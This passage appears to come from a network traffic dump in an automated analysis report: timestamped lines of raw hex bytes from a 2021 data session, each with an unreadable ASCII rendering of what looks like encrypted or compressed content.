62 3a a7 a0 61 fb 9f 32 69 21 17 7b ac e6 c0 a3 6a 7f de 2a
                                                                            Data Ascii: tQv!'uA]JW/{#I|`rr.Ep%&0&%ISw1~Y^2*t'fSl'V%Va^Ljzh$M]~f{B&P?>8MQ9W/i<7P%a:Kk+mXy{_Fn+H 2ib:a2i!{j*
                                                                            2021-10-13 17:30:43 UTC171INData Raw: 46 f2 88 c2 b9 8d c6 23 f5 cf 9e 56 bd d0 28 ee 7f eb bb 10 5c 23 36 ee 28 d7 f1 da 74 f0 c0 0d 52 99 01 62 70 97 dd 47 ec a9 7d cc b4 91 14 b5 ae 61 4e 0a e1 ef 8b b4 1a a8 57 88 6d 54 ba 50 56 9d be 4b 5b 59 8e 13 77 13 e0 79 9e 7e 83 53 51 d8 23 a3 05 d1 9a e0 fe 83 3b 74 1a 08 f0 5c 57 fc b1 55 66 4c a3 a5 3c 92 26 3c c1 fd 2b f9 95 f1 26 e8 e1 5d bc 5f 71 6d 69 80 5e cd 5d 24 ef 41 ea c1 6a 84 bc e2 93 e8 af c7 44 d8 81 04 36 cb 21 22 c4 43 9b e2 57 be 3c f5 88 98 bd 3f b2 7f 71 9a c8 b1 5f 3e d9 2e e5 24 91 21 7b 19 18 d1 fe ae 19 a3 d0 39 93 a4 a3 b7 26 6a fa 4f 4d ee a2 90 58 11 00 92 55 88 d6 c2 ef b4 ba 11 05 da e2 dd 9d cc 4c 0b 9d 49 76 32 79 a1 8b 2a 9d 9f 65 0c 33 4d e6 6d 6b 68 97 04 ad c3 2f f9 df 99 27 5e 90 3f 05 9a e1 3f 5a 4b d0 7f f2
                                                                            Data Ascii: F#V(\#6(tRbpG}aNWmTPVK[Ywy~SQ#;t\WUfL<&<+&]_qmi^]$AjD6!"CW<?q_>.$!{9&jOMXULIv2y*e3Mmkh/'^??ZK
                                                                            2021-10-13 17:30:43 UTC172INData Raw: e3 9a 56 cc f7 81 47 66 2f 81 1b 5e e7 7b 0a ff 9c 84 31 4f b9 30 95 61 d9 a6 d1 7a 63 27 3c 46 3d 16 15 e7 02 c1 24 00 c9 41 f1 83 3d 96 47 15 58 98 df d9 3e c1 78 d5 b9 74 6a 5c d4 57 c5 90 b0 23 81 0f 72 e1 6d 2f f5 9a 29 96 99 76 66 9c 85 88 a3 e8 28 c9 73 98 4e a7 2f 4c 01 71 54 44 d5 87 85 3b ea a9 c2 18 0f a2 e7 29 aa f4 4a 62 52 9f 27 d7 38 62 f2 1b 47 4c 71 c2 60 05 77 6e 67 bd 77 58 4f ac 35 0e 02 8c ec 36 82 eb b3 a3 00 0d 09 08 0b 98 14 19 8d d4 30 4e 00 90 33 7c f3 e1 15 d1 44 4e 2d 65 8c 46 60 90 f1 a8 7b dd c8 20 ce 39 a8 fb f0 01 ee 07 50 c3 e4 af 55 e3 49 33 68 58 87 47 57 af 5c 31 1d 91 c9 58 32 ec 6f 53 d6 1b 16 a4 35 fd 5b 6d 4d 32 17 5e aa 76 fb 82 d6 7b 8a 39 9d aa 62 5f cb fd e8 5b f1 13 3e 77 d8 38 c0 d4 37 b8 20 6d d8 c5 22 03 ad
                                                                            Data Ascii: VGf/^{1O0azc'<F=$A=GX>xtj\W#rm/)vf(sN/LqTD;)JbR'8bGLq`wngwXO560N3|DN-eF`{ 9PUI3hXGW\1X2oS5[mM2^v{9b_[>w87 m"
                                                                            2021-10-13 17:30:43 UTC173INData Raw: f4 d2 ab 67 a4 80 09 a2 88 2b 64 d0 87 f9 6e cf d8 6e 64 34 a1 e4 a4 84 60 fa 02 c5 bf a8 c5 09 28 ad 88 d7 5c 90 51 aa fb be 58 5b 28 9d 7f 8f 13 7c 7d b4 7f c7 4a 57 cb 23 d2 16 51 53 e6 be 99 11 65 66 6f f0 2a 74 8d a2 81 ef 4b 53 b4 16 84 7a 59 c1 6b 08 88 86 45 9b ea 3a 5f 96 59 05 6f 4d 93 5e bc 4e 98 21 47 7d db 40 e2 5b 89 93 68 8e b6 57 cc 2e 11 ed c9 0b 24 b8 43 bf f1 57 cf 2f ba cc 9b 70 25 98 19 d6 e6 d9 a2 5f 4f ca 70 05 14 61 30 51 5d b7 bf fe 50 18 d2 c3 55 74 b1 78 b5 0c 7b 8e 72 69 68 a2 e1 4b f1 ff 92 25 80 fc d4 c7 d8 ba 3a 21 ab f1 e9 3f cb bc 1a b7 5f 1e 63 79 90 af 5b 8e 7f a9 0a 85 49 cc 7b cf 3f 97 47 89 b1 3c 61 a3 9a 37 55 ba 29 95 ce e1 61 7e 3f c3 37 10 84 97 4a 64 fb 99 40 55 1c 73 33 22 99 10 d2 6a 43 ad c9 31 c1 79 04 6e 2a
                                                                            Data Ascii: g+dnnd4`(\QX[(|}JW#QSefo*tKSzYkE:_YoM^N!G}@[hW.$CW/p%_Opa0Q]PUtx{rihK%:!?_cy[I{?G<a7U)a~?7Jd@Us3"jC1yn*
                                                                            2021-10-13 17:30:43 UTC175INData Raw: db d7 9a 5b 2f fc 46 70 00 3d d1 02 77 20 7d cf f1 0b af 18 92 09 03 04 ae df 87 35 bc 7e c9 6e 58 94 5d 9a 41 ad d8 b6 d7 8a 72 74 b1 ff 26 d0 9e 66 80 05 3e 60 c2 8e f5 a5 40 b6 c0 8d 99 01 b6 87 7a 01 da 7e 39 d3 0b 7f 0e c4 a8 92 09 d3 94 e7 e2 80 89 4c 46 98 aa bf d4 68 74 1a 53 41 5c 7a bf 66 b5 30 7a 42 b9 26 4e 53 2d 35 85 12 f1 ea 46 d4 ff 4d a2 51 1b 21 3f 0b e6 3f 64 8b 20 c7 51 25 94 61 6a af a8 13 af 6f 33 2b d9 8f 58 9e 91 a3 ae 0b 82 ec 33 ce 44 ae 8b 8a 0f c0 06 03 d5 78 98 55 3b 62 4e 6e ac eb 49 cf ac 0f 27 b5 a6 c9 a8 19 91 69 07 b6 3b a7 a0 61 eb 87 24 4b 38 3b 23 ac ce ad a2 6a 7f de 3f 6d f5 46 7c e8 80 ee 9b 01 0e 77 76 8d 3e c4 88 13 e9 0c 10 de 0d c9 1e 6d ba fd 1a d8 ad 0e 49 c8 64 db cf a6 0c 13 f6 f7 8c 44 be f6 5c 24 34 66 2a
                                                                            Data Ascii: [/Fp=w }5~nX]Art&f>`@z~9LFhtSA\zf0zB&NS-5FMQ!??d Q%ajo3+X3DxU;bNnI'i;a$K8;#j?mF|wv>mIdD\$4f*
                                                                            2021-10-13 17:30:43 UTC176INData Raw: 3d 1a e2 ef 8b b4 9f a8 72 9d 31 5e ed 50 50 8b bd 4b 5b 59 0b 13 e5 10 9a 7f c9 7e d1 45 52 d8 23 a3 80 d1 59 f3 58 9b 6c 74 54 1e f3 5c 57 fc 34 55 6e 49 b5 b6 6b 92 34 28 c2 fd 2b f9 10 f1 5c ff dc 5d eb 5f 77 76 6a 80 5e cd d8 24 93 45 9b d9 3d 84 dd f8 90 e8 af c7 c1 d8 4b 06 0b cb 76 22 00 5a 98 e2 57 be b9 f5 29 99 96 27 e5 7f 69 83 cb b1 5f 3e 5c 2e ad 02 87 32 2c 19 63 ce fd ae 19 a3 55 39 6b b3 9e b7 71 6a 65 51 4e ee a2 90 dd 11 3d 84 c3 82 81 c2 c8 ae b9 11 05 da 67 dd 6d c9 5a 18 ca 49 34 15 7a a1 8b 2a 18 9f b1 13 63 4b b1 6d 89 49 94 04 ad c3 aa f9 2a 9f d1 57 c7 3f f7 b8 e2 3f 5a 4b 55 7f e2 9f 71 48 19 ed e7 36 56 6d 57 47 b4 39 b0 d7 8c 41 d0 cf a8 b7 7a 83 4a 5f 55 99 eb bd e8 44 bf e0 a4 d3 39 54 ef cf 9f df 89 dd 3c 57 f8 f5 56 d1 90
                                                                            Data Ascii: =r1^PPK[Y~ER#YXltT\W4UnIk4(+\]_wvj^$E=Kv"ZW)'i_>\.2,cU9kqjeQN=gmZI4z*cKmI*W??ZKUqH6VmWG9AzJ_UD9T<WV
                                                                            2021-10-13 17:30:43 UTC177INData Raw: dc d9 3e c1 e8 dd b7 58 72 5f e7 57 1c d9 b3 23 81 0f e2 e9 ad 21 36 9c 1b 96 d7 3f 65 9c 85 88 33 e0 e7 c0 6b 9b 7c a7 73 05 02 71 54 44 45 8f b8 08 22 aa ef 18 c5 e8 e4 29 aa f4 da 6a 99 aa 59 d6 15 62 22 51 44 4c 71 c2 f0 0d 87 7c a4 bb 5b 58 0a e7 36 0e 02 8c 7c 3e 6d fc ab a0 2c 0d 5b 43 08 98 14 19 1d dc 29 58 c3 96 1c 7c 33 aa 16 d1 44 4e bd 6d 21 5a 78 93 de a8 ad 96 cb 20 ce 39 38 f3 72 04 26 04 7e c3 98 e4 56 e3 49 33 f8 50 a6 4a 29 ae 72 31 b7 db ca 58 32 ec ff 5b 1a 2e 41 a2 1c fd a3 27 4e 32 17 5e 3a 7e b9 a1 8c 7d a3 39 33 e0 61 5f cb fd 78 53 72 1b 91 74 f0 38 bb 9d 34 b8 20 6d 48 cd 3c 1c 8b b8 80 7c 53 c4 1c 5a c8 19 4d c6 b4 18 f5 f4 8a 8a f5 ab d1 9c 24 49 f0 9e 5a be aa 42 5b 43 47 ac 73 2f a7 8c a0 5f 3a 6f 6c 81 4e 4e 54 84 42 19 c6
                                                                            Data Ascii: >Xr_W#!6?e3k|sqTDE")jYb"QDLq|[X6|>m,[C)X|3DNm!Zx 98r&~VI3PJ)r1X2[.A'N2^:~}93a_xSrt84 mH<|SZM$IZB[CGs/_:olNNTB
                                                                            2021-10-13 17:30:43 UTC178INData Raw: 40 6f 73 51 09 b0 16 13 0b 19 2d 6e 16 2b 81 26 9b ae 1d 12 48 8c a4 fd 99 65 a8 d2 64 9e e7 b3 17 a6 46 60 d1 75 8e a3 4e d6 44 4a b8 cb 24 63 97 28 af 74 d1 04 b4 0f 36 2c 9e ca c0 07 1d a2 b7 be b0 75 74 8c 9e 50 93 4a 6f 19 95 96 cc bb 17 af de 2f 67 19 23 e1 23 c6 f4 d5 85 7c d9 a5 bc 93 87 db db d7 00 90 2c fc 46 70 80 3d d4 01 27 26 7d cf dd c1 ac 18 92 09 83 04 2a d7 3f 3c bc 7e 6b 9b 5b 94 5d 9a c1 ad 70 b3 c5 83 72 74 31 0a 25 d0 9e 66 00 05 15 73 7a 87 f5 a5 1a 43 c3 8d 99 01 31 87 c6 02 97 56 39 d3 93 88 0d c4 a8 92 8e d3 89 f2 cf a8 89 4c 54 6c a9 bf d4 68 f4 1a a7 44 aa 73 bf 66 6d cd 79 42 b9 26 ce 53 3a 21 e8 00 f1 ea bc 2e fc 4d a2 51 9b 21 6f 09 7e 16 64 8b 78 21 52 25 94 61 ea af 72 02 37 46 33 2b ab bb 5a 9e 91 a3 3e 13 ce ca c6 cc 44
                                                                            Data Ascii: @osQ-n+&HedF`uNDJ$c(t6,utPJo/g##|,Fp='&}*?<~k[]prt1%fszC1V9LTlhDsfmyB&S:!.MQ!o~dx!R%ar7F3+Z>D
                                                                            2021-10-13 17:30:43 UTC179INData Raw: 81 76 cc 4b b4 31 b5 f5 c9 23 69 bf c5 21 23 ae c2 a5 05 d7 bf 1d 1d 68 a0 c6 55 92 54 ef 6b 54 cd d3 2c d1 ea 4a c0 ff 77 55 74 c7 27 e1 66 92 29 d6 c3 f2 a0 f4 e9 8b 91 23 91 e8 9d 56 bd d0 ad ee a4 ec eb 16 0b 23 93 c9 2b d7 f1 da f1 f0 fe 39 44 8a 56 62 4b bc de 47 ec a9 f8 cc fa a6 02 a6 f9 61 47 39 e2 ef 8b b4 9f a8 59 bb 31 5e ed 50 6d a8 bd 4b 5b 59 0b 13 76 14 9a 7f c9 7e 2f 67 52 d8 23 a3 80 d1 04 d3 58 9b 6c 74 6f 3f f3 5c 57 fc 34 55 43 4b b5 b6 6b 92 51 09 c2 fd 2b f9 10 f1 19 ec dc 5d eb 5f 50 57 6a 80 5e cd d8 24 32 47 9b d9 3d 84 37 d9 90 e8 af c7 c1 d8 b7 17 0b cb 76 22 31 7b 98 e2 57 be b9 f5 90 9b 96 27 e5 7f 66 a2 cb b1 5f 3e 5c 2e c2 12 87 32 2c 19 61 ef fd ae 19 a3 55 39 07 b1 9e b7 71 6a 60 70 4e ee a2 90 dd 11 b9 94 c3 82 81 c2 d0
                                                                            Data Ascii: vK1#i!#hUTkT,JwUt'f)#V#+9DVbKGaG9Y1^PmK[Yv~/gR#Xlto?\W4UCKkQ+]_PWj^$2G=7v"1{W'f_>\.2,aU9qj`pN
                                                                            2021-10-13 17:30:43 UTC180INData Raw: 9c 18 d1 82 9c 9a 25 df a7 65 86 d3 08 18 b9 72 d3 a2 48 c5 5d ce b6 91 ce ad 09 47 38 57 0c d0 2e e3 5c cc 5a 3e 44 b5 c3 26 2b 1e 89 78 52 ee dc 41 e7 93 70 ce c6 81 2f 08 2c 81 1b 5e 77 73 61 d7 33 87 01 4f 07 59 96 61 d9 a6 41 72 99 2b 1a 44 0d 16 f9 8e 01 c1 24 00 59 49 67 8b fe 90 74 15 e2 f1 dc d9 3e c1 e8 dd c8 5c 72 5f e7 57 a5 fa b3 23 81 0f e2 e9 e5 0b 36 9c 1b 96 2c 1c 65 9c 85 88 33 e0 26 c4 6b 9b 7c a7 cd 26 02 71 54 44 45 8f 4d 3f 22 aa ef 18 b8 c8 e4 29 aa f4 da 6a d2 ae 59 d6 15 62 96 71 44 4c 71 c2 f0 0d 26 4b a4 bb 5b 58 fd c7 36 0e 02 8c 7c 3e df fb ab a0 2c 0d f1 63 08 98 14 19 1d dc 10 61 c3 96 1c 7c 5d 8a 16 d1 44 4e bd 6d 8f 5e 78 93 de a8 00 b7 cb 20 ce 39 38 f3 85 3f 26 04 7e c3 4d c5 56 e3 49 33 f8 50 53 4e 29 ae 72 31 e2 fb ca
                                                                            Data Ascii: %erH]G8W.\Z>D&+xRAp/,^wsa3OYaAr+D$YIgt>\r_W#6,e3&k|&qTDEM?")jYbqDLq&K[X6|>,ca|]DNm^x 98?&~MVI3PSN)r1
                                                                            2021-10-13 17:30:43 UTC182INData Raw: f4 b3 90 29 79 97 ea cc 35 2e ac 7c 0f 1d f8 91 57 09 51 39 5f 73 74 2b ab 55 95 bd c7 0f 89 ec b5 d1 21 9c b0 bf ad 3b 67 82 e8 0d 14 76 b5 f2 fd 30 31 f3 a7 67 5a 3e 0a a2 88 2b f4 c8 8f d8 a1 ee d4 6e 00 8a a2 e4 a4 84 f7 e2 b1 fa 09 89 c9 09 46 1c 8b d7 5c 90 c6 aa b5 bb ad 59 24 9d 03 3f 10 7c 7d b4 e8 c7 2d 4b 3e 21 de 16 e3 e2 e5 be 99 11 e2 66 6d f5 ba 55 81 a2 06 5e 48 53 b4 16 04 7a d0 df 1b 29 84 86 85 83 e8 3a 5f 96 c9 1d ef 6c 66 5c b0 4e b1 97 44 7d db 40 12 58 e0 b3 0e ad ba 57 6e 99 12 ed c9 0b b4 a0 9d 9e 04 55 c3 2f 2d 7b 98 70 25 98 e9 d5 cb e8 57 5d 43 ca d7 b2 17 61 30 51 8f b4 23 fb 48 1b de c3 23 c2 b2 78 b5 0c fc 96 3a 68 08 a0 ed 4b 2a 49 91 25 80 fc 54 c7 b5 be f7 07 a7 f1 81 8a c8 bc 1a b7 df 1e ce 5f 47 89 57 8e e2 1c 09 85 49
                                                                            Data Ascii: )y5.|WQ9_st+U!;gv01gZ>+nF\Y$?|}-K>!fmU^HSz):_lf\ND}@XWnU/-{p%W]Ca0Q#H#x:hK*I%T_GWI
                                                                            2021-10-13 17:30:43 UTC183INData Raw: af 74 d1 04 6e 05 36 2c 9e ca bb 57 1d a2 b7 be b0 75 f6 89 9e 50 93 4a d8 49 95 96 cc bb 17 af 43 3a 67 19 23 e1 c9 96 f4 d5 85 7c d9 a5 9b 96 87 db db d7 ae c0 2c fc 46 70 80 3d 35 17 27 26 7d cf b7 91 ac 18 92 09 83 04 c5 dd 3f 3c bc 7e fd c8 5b 94 5d 9a c1 ad 23 a4 c5 83 72 74 a8 59 25 d0 9e 66 00 05 7f 64 7a 87 f5 a5 82 10 c3 8d 99 01 31 87 ff 16 97 56 39 d3 0c d8 0d c4 a8 92 8e d3 91 e5 cf a8 89 4c ce 3c a9 bf d4 68 f4 1a 6b 51 aa 73 bf 66 cb 9d 79 42 b9 26 ce 53 48 37 e8 00 f1 ea d6 7e fc 4d a2 51 9b 21 ef 1d 7e 16 64 8b d6 70 52 25 94 61 ea af 4f 17 37 46 33 2b 41 ea 5a 9e 91 a3 3e 13 80 d0 c6 cc 44 ae bd 3e 0c c0 06 03 55 78 ff 50 05 4b 4e 6e 20 58 4a cf ac 0f a7 b5 78 d2 be 30 91 69 ca 07 38 a7 a0 61 6b 87 17 48 d4 15 23 ac cd 1d a1 6a 7f de af
                                                                            Data Ascii: tn6,WuPJIC:g#|,Fp=5'&}?<~[]#rtY%fdz1V9L<hkQsfyB&SH7~MQ!~dpR%aO7F3+AZ>D>UxPKNn XJx0i8akH#j
                                                                            2021-10-13 17:30:43 UTC184INData Raw: c3 f2 e3 c3 e9 8b 91 23 77 98 9d 56 bd d0 ad ee 6b de eb 16 0b 23 3a b9 2b d7 f1 da f1 f0 5f 09 44 8a 56 62 22 cc de 47 ec a9 f8 cc 72 a6 02 a6 f9 61 e9 4a e2 ef 8b b4 9f a8 e5 88 31 5e ed 50 87 db bd 4b 5b 59 0b 13 30 15 9a 7f c9 7e 88 14 52 d8 23 a3 80 d1 2a e6 58 9b 6c 74 16 4f f3 5c 57 fc 34 55 0f 4d b5 b6 6b 92 e8 79 c2 fd 2b f9 10 f1 dd e8 dc 5d eb 5f ae 27 6a 80 5e cd d8 24 bb 4f 9b d9 3d 84 8d a9 90 e8 af c7 c1 d8 38 12 0b cb 76 22 56 0b 98 e2 57 be b9 f5 7e 91 96 27 e5 7f c2 d3 cb b1 5f 3e 5c 2e 40 17 87 32 2c 19 8c 9e fd ae 19 a3 55 39 90 a4 9e b7 71 6a cf 01 4e ee a2 90 dd 11 80 91 c3 82 81 c2 bc f9 b9 11 05 da 67 dd 28 de 5a 18 ca 49 82 42 7a a1 8b 2a 18 9f 3b 08 63 4b b1 6d 72 1e 94 04 ad c3 aa f9 d6 8e d1 57 c7 3f 4a ef e2 3f 5a 4b 55 7f d0
                                                                            Data Ascii: #wVk#:+_DVb"GraJ1^PK[Y0~R#*XltO\W4UMky+]_'j^$O=8v"VW~'_>\.@2,U9qjNg(ZIBz*;cKmrW?J?ZKU
                                                                            2021-10-13 17:30:43 UTC185INData Raw: cd bc 70 ce c6 81 74 78 2c 81 1b 5e 77 73 b7 f3 33 87 01 4f 58 29 96 61 d9 a6 41 72 42 1e 1a 44 0d 16 22 fd 01 c1 24 00 59 49 5a ab fe 90 74 15 44 82 dc d9 3e c1 e8 dd 7f 69 72 5f e7 57 cf 8a b3 23 81 0f e2 e9 c4 22 36 9c 1b 96 81 6c 65 9c 85 88 33 e0 4d f0 6b 9b 7c a7 21 56 02 71 54 44 45 8f 88 09 22 aa ef 18 1b b8 e4 29 aa f4 da 6a 95 9a 59 d6 15 62 f3 01 44 4c 71 c2 f0 0d 9b 7d a4 bb 5b 58 59 b6 36 0e 02 8c 7c 3e 0f cc ab a0 2c 0d 0d 12 08 98 14 19 1d dc 5d 56 c3 96 1c 7c e1 fb 16 d1 44 4e bd 6d 7e 6c 78 93 de a8 63 c7 cb 20 ce 39 38 f3 22 0f 26 04 7e c3 ea b5 56 e3 49 33 f8 50 db 4e 29 ae 72 31 01 8b ca 58 32 ec ff 5b 83 3b 41 a2 1c fd 51 77 4e 32 17 5e 3a 7e 62 a4 8c 7d a3 39 82 b0 61 5f cb fd 78 53 03 0e 91 74 f0 38 c4 f2 34 b8 20 6d 48 cd 5f 18 8b
                                                                            Data Ascii: ptx,^ws3OX)aArBD"$YIZtD>ir_W#"6le3Mk|!VqTDE")jYbDLq}[XY6|>,]V|DNm~lxc 98"&~VI3PN)r1X2[;AQwN2^:~b}9a_xSt84 mH_
                                                                            2021-10-13 17:30:43 UTC187INData Raw: d6 f0 89 6a 16 05 a1 a2 4c 00 88 ca 5c dc 5d c9 ba 6e c5 b2 ba c1 55 86 a0 e2 87 e8 18 89 75 09 ce 2d 77 d6 9d 90 dc b2 77 bd 8a 5b 43 b2 00 05 03 7d 1e a1 7d c4 5f 51 57 08 a9 15 c8 d9 28 8d 96 12 5d 67 92 da 56 54 cd a3 6d 72 91 51 7d 16 f1 5d 3d c3 34 2b 96 8a ed ba d3 3b f5 9a 16 1c bc 68 f9 47 de 4e 65 ac e2 59 f9 43 c5 59 69 b6 6e af ee 56 66 b3 38 ee e0 0a a1 93 74 99 cb 56 2e 08 c1 42 cb 71 ac bb 43 d6 59 c9 29 6d 7e c9 f7 88 43 72 77 52 c0 b4 ad ef bd 19 c2 c2 32 e2 ba 7b d4 0d 99 b4 1f 4f 87 a3 16 54 97 72 e2 24 9a d9 d1 c7 cb ba 60 10 83 f2 5c b0 ca ac 44 b4 c8 1f f5 53 c5 88 a3 8f 5f 03 42 84 d8 cd c8 c4 27 95 bd ac bc 2c 7d 2f 5a 36 32 92 b4 96 25 e1 68 72 da c0 e6 81 06 84 b4 65 74 98 ed 7b f5 54 de 23 e3 ac 2d 6b da ac ad 18 2b 7b 1a 4b d4
                                                                            Data Ascii: jL\]nUu-ww[C}}_QW(]gVTmrQ}]=4+;hGNeYCYinVf8tV.BqCY)m~CrwR2{OTr$`\DS_B',}/Z62%hret{T#-k+{K
                                                                            2021-10-13 17:30:43 UTC188INData Raw: 5c d0 40 8c ff fe 7f 64 2e 34 6a 03 6f 2f 3e c6 70 d7 b4 3d 0a 0a f4 07 65 f3 9b 37 f8 7d 31 bd 77 95 b4 99 12 8d 84 b8 ca 82 7b 79 a0 1e 8e d0 fd 42 df 04 9b 67 18 90 f3 ac c9 56 73 84 19 08 56 84 a3 1f 54 50 b5 d0 05 81 2a c0 a9 96 69 c6 af e7 d8 a9 97 5b 4f 7e 5a bc 4e 77 47 1e f6 46 23 52 8b 67 ec d8 c2 6f 24 2f e9 53 6d 34 ca 0b 65 e8 99 32 56 48 4b 53 77 34 86 03 29 14 8e 8b 0f 3e e1 25 e5 74 ca ab 4d 16 ab 51 94 22 39 ad 7c 96 13 a4 a1 17 1b fa c0 c7 90 ae 6b 51 d7 c5 57 01 d9 5d 56 50 4a 49 dd 45 7b 15 c4 cf 4d 3d 08 bf 58 c8 36 28 d3 63 f2 40 4b b2 e9 60 6c 86 bf 4c 74 1d 57 a8 fd 69 e8 60 66 da 23 50 53 67 6e cf f3 f8 cf fc 2e 73 6c a8 84 d8 03 37 99 33 ce d4 e4 35 05 48 a9 fd 45 df d1 3b 49 c8 50 df 56 6e b1 17 a7 f3 12 59 18 d7 cd 20 1c 6c 52
                                                                            Data Ascii: \@d.4jo/>p=e7}1w{yBgVsVTP*i[O~ZNwGF#Rgo$/Sm4e2VHKSw4)>%tMQ"9|kQW]VPJIE{M=X6(c@K`lLtWi`f#PSgn.sl735HE;IPVnY lR
                                                                            2021-10-13 17:30:43 UTC189INData Raw: 22 18 d1 e9 48 92 4f be 0c 8f 97 48 dc 46 9b 8f bd 6e c8 5e ac 15 6b 08 2f 6b 8d 78 a0 76 19 d9 2a a7 0b c5 5c f1 67 99 5c 67 96 0b 10 5e 7e e9 79 57 cd 4a fd 9d 34 85 eb 2f 01 fa 0c ee 2f f1 f6 fe b2 48 3f 5f 47 47 ab 97 0f cc 03 37 65 51 3c dd 3e 8d 97 ec db ee da e3 a0 cf 32 11 9c dc d0 20 31 58 0d e2 16 a6 be f1 b2 9f 95 30 31 7f 9a 94 66 a9 f6 3e 0f 03 67 0d 70 31 38 35 71 c8 6e af 61 82 26 2c 98 b6 62 90 1f 6a 77 53 56 cb b0 8a 5a 10 3f 8b a4 86 ed c3 8e 80 3a 17 44 d8 88 f9 83 ce b5 1f b6 5d 0d 11 79 a4 49 08 3f 85 56 0d 50 67 14 6e be 4b 2e 2d 1a d9 95 f9 36 be f5 4f 83 3c c2 b5 ec 24 eb 4b 3f 7f 9e 9e 6b 4a 7e c8 8a 32 50 6c 4d 62 5a 3e 7c d3 4e 4b 2f c8 cd b3 c5 ad 64 5e 92 98 11 a8 32 45 3e e0 7f cd ab 52 eb ce 7b de 4c de de 54 f7 f4 1a d2 96
                                                                            Data Ascii: "HOHFn^k/kxv*\g\g^~yWJ4//H?_GG7eQ<>2 1X01f>gp185qna&,bjwSVZ?:D]yI?VPgnK.-6O<$K?kJ~2PlMbZ>|NK/d^2E>R{LT
                                                                            2021-10-13 17:30:43 UTC191INData Raw: 17 de 24 e4 6d dd 47 5e b3 51 bc 57 84 d5 eb 13 69 0c bd ee 23 32 1e 9a 1f 93 6b 28 dc bb 94 89 29 cc 93 c4 5c 9e 7e b7 59 2f b1 71 25 51 37 a8 47 08 bb b8 7e 3f 32 e1 fc 0c 6a f4 ad 6d cc 8d b1 d0 41 60 f3 79 43 64 98 c5 08 17 d0 53 b3 be 0e 4b ca ee 1d 0c 6c 96 ca 3a 29 fc 2b b2 42 0d 48 4e 88 b4 94 15 d2 dd 46 45 eb 90 25 7d b5 81 07 d1 08 4f 31 48 be 58 b7 90 aa a0 ad b0 70 27 15 20 0d f0 c0 09 d8 15 c6 eb 3c eb 70 eb cb 34 2a 51 4d 7a 15 ab 43 30 08 fa e6 59 3b e8 01 74 89 12 f3 a1 7b d8 47 23 00 33 33 56 2e 79 53 a7 1d 6f 03 11 29 ee 47 57 49 fa b2 52 4b 21 59 77 d1 39 b2 88 a6 be 7c 6c c4 e8 22 1f 54 b9 36 57 40 e2 27 59 a0 0f f5 c7 65 0e b9 e5 54 a3 00 a5 d1 b9 e3 4e 02 9f 8f 93 dc 40 42 42 a6 93 54 2b a6 88 ae 77 f5 78 f3 87 a3 7c 04 8f 71 1d c8
                                                                            Data Ascii: $mG^QWi#2k()\~Y/q%Q7G~?2jmA`yCdSKl:)+BHNFE%}O1HXp' <p4*QMzC0Y;t{G#33V.ySo)GWIRK!Yw9|l"T6W@'YeTN@BBT+wx|q
                                                                            2021-10-13 17:30:43 UTC192INData Raw: ed b1 46 eb 4e 50 4c 26 9e 3a f8 d8 94 be 5c 11 5a 66 86 e6 c5 7b d2 a2 f6 73 e8 7f 9a 16 39 6d ea ec bd 2b d2 86 b4 b9 aa 3a 4c 96 42 1d 36 68 93 5e d0 4e 67 ad 5d 7d f7 40 cd 58 88 92 33 af a4 57 c3 a3 3c ed aa 0b 31 a0 44 9a 8b 57 cd 2f 01 41 1a 70 0e 98 3a d5 03 c9 aa 5f 12 ca ad 88 6e 61 75 51 9a b4 4e ff eb 19 2a c3 4a f9 b6 79 15 0c 41 96 17 4c 4f a2 5b 4b 54 72 32 25 53 fc 87 c7 09 bb 02 05 c7 f1 7e b1 09 bc 64 b6 89 1e 3a 78 e4 8b e9 8e 7c 27 08 87 8a cc 7e cf 50 96 e4 ad e8 3c bc 2c 78 37 d6 ba 7a 95 bc e1 14 5a 0e c3 7f 81 96 97 57 64 cd 98 21 54 70 57 67 23 12 80 96 6a 03 ac e4 31 f6 78 c3 4b 4c c3 84 ca c6 0f 55 c2 fd 11 b7 3a 7f ef 8a 09 5f ec f2 da 10 85 55 86 fe 92 f8 72 31 49 4c da 67 64 2d fa bc fc 31 14 29 31 69 c9 d5 10 ed b7 c1 18 b0
                                                                            Data Ascii: FNPL&:\Zf{s9m+:LB6h^Ng]}@X3W<1DW/Ap:_nauQN*JyALO[KTr2%S~d:x|'~P<,x7zZWd!TpWg#j1xKLU:_Ur1ILgd-1)1i
                                                                            2021-10-13 17:30:43 UTC193INData Raw: 0a 0a fe 7a 9c 85 2d 84 d5 48 c1 8d bb 1d 65 89 08 00 05 5a 7e cd 8f 9e e6 c8 6a 9c 18 d3 db f9 eb a4 f4 4c b9 48 7b a2 d4 68 a9 12 65 58 4c 71 9b 6e 37 c5 7b 42 49 35 69 4c e9 34 2a 0b 84 f4 3e 38 72 65 b5 72 0d 21 18 25 54 09 19 8b 98 13 4d 06 94 61 83 b4 66 1a d1 44 e4 00 83 85 58 9e 54 ac 1c 3a 98 c9 92 e3 f5 b3 f3 79 e5 ea bc 2a c3 78 e3 53 d6 57 33 6e 1a 12 8a c1 ac 0f e1 bc 16 c6 58 32 24 6a 99 4e 3a a7 05 42 3f 89 2a 4c 36 17 5d ac 7c 5a a6 6a 7a de 3b 75 e9 63 58 cb ff ee 54 f6 06 77 74 8d 37 dc 99 36 ba 20 79 de c0 31 1e 6d af fd 71 db c9 1e 4c c8 16 db c7 5c 1a 13 f9 f7 88 5c d9 d3 8d 24 4b 66 e0 1b ae 4c 41 26 3c 8d b0 71 2d a7 92 37 4a d1 78 8a 9c 32 5b b8 89 40 39 c7 b4 1a 10 31 bb c6 c3 a1 ef 62 43 08 9e c3 71 d0 55 9e 19 78 52 3f f7 29 7d
                                                                            Data Ascii: z-HeZ~jLH{heXLqn7{BI5iL4*>8rer!%TMafDXT:y*xSW3nX2$jN:B?*L6]|Zjz;ucXTwt76 y1mqL\\$KfLA&<q-7Jx2[@91bCqUxR?)}
